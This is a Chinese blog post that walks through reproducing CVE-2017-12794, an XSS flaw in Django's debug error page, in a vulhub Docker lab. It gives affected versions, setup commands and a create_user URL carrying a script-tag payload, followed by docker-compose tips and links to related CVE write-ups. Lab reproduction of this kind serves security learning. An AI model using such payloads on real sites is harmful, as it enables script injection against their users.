Django debug page XSS漏洞(CVE-2017-12794)

最新推荐文章于 2024-04-12 01:57:17 发布
最新推荐文章于 2024-04-12 01:57:17 发布
阅读量521 收藏
点赞数
分类专栏: 中间件漏洞复现 文章标签: django 安全漏洞 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zy15667076526/article/details/111134982
版权

声明

好好学习,天天向上

漏洞描述

Django是Django软件基金会的一套基于Python语言的开源Web应用框架。该框架包括面向对象的映射器、视图系统、模板系统等。Django1.10.8之前的版本和1.11.5之前的1.11.x版本中的Technical500Template存在安全漏洞,该漏洞源于程序没有正确的过滤用户提交的输入。远程攻击者可利用该漏洞在浏览器中执行任意脚本代码。

影响范围

Djangoproject Django 1.11.1 -1.11.4

Djangoproject Django 1.10.6-1.10.7

复现过程

这里使用1.11.4版本

使用vulhub

cd /app/vulhub-master/django/CVE-2017-12794

使用docker启动

docker-compose up -d

环境启动后,访问创建用户,IP自己改哦

http://192.168.239.129:8000/create_user/?username=<script>alert(1)</script>

在这里插入图片描述

成功后,再次访问,触发异常:

http://192.168.239.129:8000/create_user/?username=<script>alert(1)</script>

在这里插入图片描述

关闭镜像(每次用完后关闭)

docker-compose down

docker-compose常用命令

拉镜像(进入到vulhub某个具体目录后)

docker-compose build
docker-compose up -d

镜像查询(查到的第一列就是ID值)

docker ps -a

进入指定镜像里面(根据上一条查出的ID进入)

docker exec -it ID /bin/bash

关闭镜像(每次用完后关闭)

docker-compose down
维梓-
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Django 开发调试工具 Django-debug-toolbar使用详解
09-19
**Django调试利器:Django-debug-toolbar** Django-debug-toolbar是一款强大的开源调试工具,它为Django开发者提供了丰富的请求和响应信息,帮助开发者快速定位和解决问题。通过在Django项目的界面中集成一系列可...
Django debug page XSS漏洞CVE-2017-12794)分析
mmdlm的博客
08-17 488
基本介绍Django 是一个由 Python 编写的一个开放源代码的 Web 应用框架。使用 Django,只要很少的代码,Python 的程序开发人员就可以轻松地完成一个正式网站所需要的大部分内容,并进一步开发出全功能的 Web 服务 Django 本身基于 MVC 模型,即 Model(模型)+ View(视图)+ Controller(控制器)设计模式,MVC 模式使后续对程序的修改和扩展简化,并且使程序某一部分的重复利用成为可能Django详情参考菜鸟教程。...
14 - vulhub - Django debug page XSS漏洞CVE-2017-12794
最新发布
2401_83817343的博客
04-12 550
因为官方说明是500页面中出现的BUG,所以我们重点关注django/views/debug.py。Github上有Django的仓库,下载下来,用1.11.4和1.11.5进行比较:git clone https://github.com/django/django.gitcd djangogit diff 1.11.4 1.11.5 django/views/debug.py关于造成漏洞功能点的探索:如果要触发这两个输出点,就必须进入这个if语句:。首先我们来想一下,正常情况下,这个位置是干嘛用的,也就
CVE-2020-7471原理分析及复现
无知亦乐
01-10 1131
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录漏洞简介漏洞影响版本一、漏洞原理分析二、相关说明三、复现总结 漏洞简介 2020年2月3日,Django 官方发布安全通告公布了一个通过StringAgg(分隔符)实现利用的潜在SQL注入漏洞CVE-2020-7471)。攻击者可通过构造分隔符传递给聚合函数contrib.postgres.aggregates.StringAgg,从而绕过转义符号(\)并注入恶意SQL语句。 漏洞影响版本 一、漏洞原理分析 在 Github
CVE-2017-12794_Django debug page XSS漏洞
mirocky的博客
12-28 636
3、向数据库中插入相同数据,Django报错,数据被打印且执行。对打印的exception进行了HTML转义。2、首次向数据库中插入数据,成功插入。1、vulhub搭建环境。
XSS漏洞复现(CVE-2017-12794
m0_56578216的博客
08-30 373
前提条件:1.
django-debug-toolbar-request-history
05-26
pip install django-debug-toolbar-request-history 然后将面板添加到DEBUG_TOOLBAR_PANELS (有关更多详细信息,请参见config部分)。 注意:现在仅支持Django Debug Toolbar 2.0及更高版本。 对于旧版本,请
CVE-2020-7471:django 漏洞CVE-2020-7471 Potential SQL injection via StringAgg(delimiter) 的漏洞环境和 POC
04-14
CVE-2020-7471这个仓库提供 CVE-2020-7471 Potential SQL injection via StringAgg(delimiter) 漏洞的环境和 POC受影响的 django 版本1.11 到 1.11.28(不含)2.2 到 2.2.10(不含)3.0 到 3.0.3(不含)下载使用前...
Django_CVE-2020-9402_Geo_SQL注入分析1
08-03
然而,在 Django 中的 GIS 查询中存在一个_sql 注入漏洞,编号为 CVE-2020-9402,这个漏洞允许攻击者执行恶意的 SQL 语句,从而获取敏感信息或控制服务器。 GIS 查询란什么? GIS 查询是 Geographic Information ...
漏洞复现】Django_debug page_XSS漏洞(CVE-2017-12794)
过期的秋刀鱼
11-05 600
1.11.5版本,修复了500页面中存在的一个XSS漏洞Django 1.11.5版本。再次刷新页面触发XSS
利用Vulnhub复现漏洞 - Django debug page XSS漏洞CVE-2017-12794)分析
JiangBuLiu的博客
07-02 2007
Django debug page XSS漏洞CVE-2017-12794)分析Vulnhub官方复现教程漏洞原理漏洞复现启动环境创建用户触发漏洞漏洞利用 Vulnhub官方复现教程 https://vulhub.org/#/environments/django/CVE-2017-12794/ 漏洞原理 在使用Postgres数据库并触发异常的时候,psycopg2会将字段名和字段值全部抛出。...
Django debug page XSS漏洞
OldBowl
12-06 902
Django debug page XSS漏洞CVE-2017-12794)学习
DjangoDEBUG模式详解
热门推荐
xujin0的博客
10-19 2万+
在settings.py文件中有一个变量为DEBUG 默认值是DEBUG = True 当DEBUG = True时的好处为 1.如果开启了DEBUG模式,那么以后我们修改了Django项目的代码,然后按下ctrl+s,那么Django就会自动的给我们重启项目,不需要手动重启。 2.如果开启了DEBUG模式,那么以后Django项目中的代码出现bug了,那么在浏览器中和控制台会打印出错信息。否...
CVE-2017-12794
10-07
CVE-2017-12794是一个影响Django框架的安全漏洞。这个漏洞源于Django框架中的Technical 500 Template没有正确过滤用户提交的输入。攻击者可以利用这个漏洞在浏览器中执行任意的脚本代码,从而导致跨站脚本攻击(XSS)。这个漏洞存在于Django 1.10.8之前的版本和1.11.5之前的1.11.x版本中。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值